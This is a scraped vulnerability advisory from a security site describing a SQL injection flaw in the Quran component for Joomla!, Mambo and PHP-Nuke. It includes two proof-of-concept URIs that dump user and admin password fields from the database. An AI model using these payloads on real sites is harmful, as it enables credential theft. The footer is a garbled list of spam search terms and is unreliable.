about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla!, Mambo and PHP-Nuke Quran Component SQL Injection Vulnerability


Title Joomla!, Mambo and PHP-Nuke Quran Component SQL Injection Vulnerability
Published 2008-02-15-12:00AM
Updated 2008-02-25-02:42PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Don discovered this vulnerability.
Vulnerable  PHP Nuke Quran 1.1
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available: http://www.example.com/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+mos_users+limit+0,20--http://www.example.com/modules.php?name=Quran&action=viewayat&surano=-9999/**/union/**/select/**/000,pwd,222,333,444/**/from/**/nuke_authors/*where%20admin1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 26 Nov 2009 09:01:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
verygame free sexy t391t news for c E61 www.moying &a OpenSSH 4. Www.Arabgi Indiabluef Www.world vegaqs 8 www.wqxinx news for c web admin desi+india calgirls sexy vedio Www.bugils tamilsexst MGUniversi com_people www.cjj777 NcFTP malayalamk Boyfriendm vefas.html mambo Remo Www.world vampire fr liuzhenonl www.wqxinx luckcr.blo mambo Remo video afla girssex.co http://www veddio sex Microsoft store.each www..Ameri t81t www.iehang CMS is Fre wwww.66589 girssex.co myspace Sexy,vidio www.pinkwo Indya